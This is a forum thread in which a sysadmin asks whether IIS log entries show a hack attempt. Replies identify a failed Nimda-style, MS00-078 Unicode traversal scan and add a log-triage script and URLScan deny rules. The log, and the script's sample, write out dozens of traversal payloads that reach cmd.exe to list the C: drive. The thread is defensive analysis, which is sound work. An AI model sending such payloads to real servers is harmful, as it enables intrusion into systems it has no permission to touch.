
Thread: IIS Log - Is somebody trying to Hack my website

  1. #1

    IIS Log - Is somebody trying to Hack my website

    Hi,

    I am the sysadmin for a web site. I was going through the IIS logs and found the following entries in the log files:

    2005-11-28 01:27:45 80.117.251.32 - 10.100.1.125 80 HEAD /index.html - 200 -
    2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /MSADC/root.exe /c+dir+c:\ 403 -
    2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:27:51 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:27:56 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:03 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:04 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:28:12 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:26 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:27 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:28:29 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:13 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:29:38 80.117.251.32 - 10.100.1.125 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:55 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:57 80.117.251.32 - 10.100.1.125 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:29:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:30:19 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:30:44 80.117.251.32 - 10.100.1.125 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:30:46 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:35 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:45 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:31:56 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:32:15 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:32:18 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:32:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:33:43 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:33:44 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:34:09 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:34:11 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:34:42 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
    2005-11-28 01:34:47 80.117.251.32 - 10.100.1.125 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:34:48 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:35:10 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:12 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:16 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:41 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:35:43 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:12 203.201.214.129 - 10.100.1.125 443 GET /index.html - 200 IPCHECK+4+www.paessler.com
    2005-11-28 01:36:28 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:30 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:36:31 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:35 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:36:36 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:47 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:36:48 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:49 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:36:59 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:37:24 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:37:26 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 -
    2005-11-28 01:38:30 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
    2005-11-28 01:38:52 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -


    I think somebody is trying to hack into the system. Need help.

    Regards,

    Vishwas

  2. #2
    AO Ancient: Team Leader (Join Date: Oct 2002, Posts: 5,197)
    No worry... Automated tool... the result codes indicate it failed.....

    Relax and crack a cold one....

  3. #3
    Just Another Geek (Join Date: Jul 2002, Location: Rotterdam, Netherlands, Posts: 3,401)
    I think Tiger is right...

    For your information.. the tool is trying to abuse MS00-078...
    It uses the same vulnerabilities as the Nimda worm..
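    The triage the first three posts do by eye (walk the W3C log lines, undo the %5c, %2e and overlong-UTF-8 tricks that MS00-078 covers, then look at the status codes) as an added example; this is not code from the thread. It runs over a constructed sample in the same log format. The field order, the lenient decoder (modelled on the permissive decoding MS00-078 describes) and the rule that only a 200 on a traversal path counts as a hit are my assumptions; IIS may log the decoded raw bytes where the sample shows %-escapes, and the decoder handles both forms.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in the same W3C Extended fields as the thread's excerpt.
# Illustrative lines, not copied from the post; the %c0%af, %c1%1c and
# %f0%80%80%af lines are written as they travel on the wire.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2005-11-28 01:27:45 80.117.251.32 - 10.100.1.125 80 HEAD /index.html - 200 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /MSADC/root.exe /c+dir+c:\\ 403 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\ 404 -
2005-11-28 01:35:10 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\\ 500 -
2005-11-28 01:36:36 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 500 -
2005-11-28 01:36:49 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir+c:\\ 500 -
2005-11-28 01:38:30 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%f0%80%80%af../winnt/system32/cmd.exe /c+dir+c:\\ 403 -
2005-11-28 01:36:12 203.201.214.129 - 10.100.1.125 443 GET /index.html - 200 IPCHECK+4+www.paessler.com
"""

# Assumed field order (matches the sample's #Fields line).
FIELDS = ("date", "time", "c_ip", "user", "s_ip", "s_port", "method",
          "uri_stem", "uri_query", "status", "user_agent")
SHELL_RE = re.compile(r"/(cmd|root)\.exe$", re.I)


def lenient_utf8(raw: bytes):
    """Decode like the permissive code path MS00-078 describes (assumption):
    the sequence length comes from the lead byte, overlong forms are accepted
    and continuation bytes are not validated. So C0 AF, F0 80 80 AF and
    FC 80 80 80 80 AF all yield '/', and C1 1C yields '\\'. A strict decoder
    rejects every one of them. Returns the text and the number of multi-byte
    sequences that collapsed to an ASCII character."""
    out, overlong, i = [], 0, 0
    while i < len(raw):
        b = raw[i]
        length = 1
        if b >= 0xC0:
            length = 2
            while length < 6 and b & (0x80 >> length):
                length += 1
        if length == 1 or i + length > len(raw):
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
            continue
        cp = b & (0xFF >> (length + 1))
        for k in range(1, length):
            cp = (cp << 6) | (raw[i + k] & 0x3F)
        if cp < 0x80:
            overlong += 1
        out.append(chr(cp) if cp < 0x110000 else "\ufffd")
        i += length
    return "".join(out), overlong


def canonicalize(uri_stem: str):
    """Percent-decode, lenient-UTF-8-decode, fold '\\' into '/', then resolve
    '.' and '..', counting how many '..' climbed above the web root."""
    raw = unquote_to_bytes(uri_stem.encode("latin-1", "replace"))
    text, overlong = lenient_utf8(raw)
    stack, escapes = [], 0
    for seg in text.replace("\\", "/").split("/"):
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escapes += 1
        elif seg not in ("", "."):
            stack.append(seg)
    return "/" + "/".join(stack), escapes, overlong


def parse_line(line: str):
    parts = line.split()
    if line.startswith("#") or len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    canonical, escapes, overlong = canonicalize(rec["uri_stem"])
    tags = []
    if escapes:
        tags.append("traversal")
    if overlong:
        tags.append("overlong-utf8")
    if SHELL_RE.search(canonical):
        tags.append("shell")
    # A 403/404/500 on these paths is the "it failed" signal; only a 200 on a
    # tagged path is treated as a hit that needs incident handling.
    return {**rec, "canonical": canonical, "tags": tags,
            "suspicious": bool(tags), "hit": bool(tags) and rec["status"] == 200}


def triage(log_text: str):
    """Group suspicious requests per client and record whether any succeeded."""
    per_ip = defaultdict(lambda: {"attempts": 0, "hits": 0, "statuses": set(), "tags": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        info = classify(rec)
        if not info["suspicious"]:
            continue
        entry = per_ip[rec["c_ip"]]
        entry["attempts"] += 1
        entry["hits"] += info["hit"]
        entry["statuses"].add(rec["status"])
        entry["tags"].update(info["tags"])
    return dict(per_ip)


if __name__ == "__main__":
    for ip, e in triage(SAMPLE_LOG).items():
        verdict = "COMPROMISE LIKELY" if e["hits"] else "blocked/failed"
        print(f"{ip}: {e['attempts']} attempts, statuses {sorted(e['statuses'])}, "
              f"{sorted(e['tags'])} -> {verdict}")
```

    Run it against a real log by passing the file contents to triage(); the useful check is not the attempt count but whether any tagged path ever returned 200, which is exactly the distinction the replies draw from the status codes.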

  4. #4
    thehorse13 (Master-Jedi-Pimps0r & Moderator; Join Date: Dec 2002, Location: Washington D.C. area, Posts: 2,885)
    Here's where the attack likely came from:

    inetnum: 80.117.0.0 - 80.117.255.255
    netname: TINIT-ADSL-LITE
    descr: Telecom Italia S.p.A. TIN EASY LITE
    country: IT
    admin-c: BS104-RIPE
    tech-c: BS104-RIPE
    status: ASSIGNED PA
    remarks: ##########################################
    remarks: Pay attention
    remarks: Any communication sent to email different
    remarks: from the following will be ignored!
    remarks: Any abuse reports, please send them to
    remarks: abuse@retail.telecomitalia.it
    remarks: ##########################################
    mnt-by: TIWS-MNT
    source: RIPE # Filtered

    person: BBBEASYIP STAFF
    address:
    address: Via Val Cannuta, 250
    address: I-00100 Roma
    address: Italy
    phone: +39 06 36881
    e-mail: ripe-staff@telecomitalia.it
    nic-hdl: BS104-RIPE
    source: RIPE # Filtered

    % Information related to '80.117.0.0/16AS3269'

    route: 80.117.0.0/16
    descr: INTERBUSINESS
    origin: AS3269
    mnt-by: INTERB-MNT

  5. #5
    Thanks a lot buddy.. now I can sleep peacefully.....

  6. #6
    Computernerd22 (AO's MMA Fanatic!; Join Date: Mar 2003, Location: Miami, FL, Posts: 795)
    IIS Log - Is somebody trying to Hack my website
    Yes. Some attacker with his "fancy" scanner

    2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
    That is what it looks like to me.

  7. #7
    Yeah, the Italian is walking through a sequence of attempts to use the Nimda backdoor to your IIS. Based on the speed of the hits, I guess the kiddie is using a script. If you've run the URLScan tool, you should be rejecting these safely. If not, you might want to take a look at your IIS hardening, just to be sure.
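    The URLScan.ini settings that bear on this log, added here as an example for the hardening the post above mentions; this fragment is not from the thread. It assumes the URLScan 2.5 option names and leaves every other section at the installed template's values, so check it against your own urlscan.ini before deploying.

```ini
; Added example, not from the thread. Assumes URLScan 2.5 syntax.
[Options]
NormalizeUrlBeforeScan=1   ; decode the URL once, then apply the checks below
VerifyNormalization=1      ; reject a URL that changes when decoded a second time
AllowHighBitCharacters=0   ; drop raw bytes >= 0x80, which covers the %c0%af family
AllowDotInPath=0           ; reject URLs containing more than one period
RejectResponseUrl=/Rejected-by-UrlScan

[DenyUrlSequences]
..  ; directory traversal
./  ; trailing dot on a directory name
\   ; backslash, i.e. the %5c variants in the log
:   ; alternate data stream access
%   ; anything still escaped after normalization
&   ; multiple CGI parameters on one request
```

    With these in place the requests in the log are refused by the filter before IIS maps the path, and they show up in the URLScan log rather than as 403/404/500 entries in the IIS log.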

  8. #8
    Senior Member (Join Date: Nov 2001, Posts: 4,785)
    The Unicode directory traversal... it's really sad, but he'll probably find a few vulnerable servers.
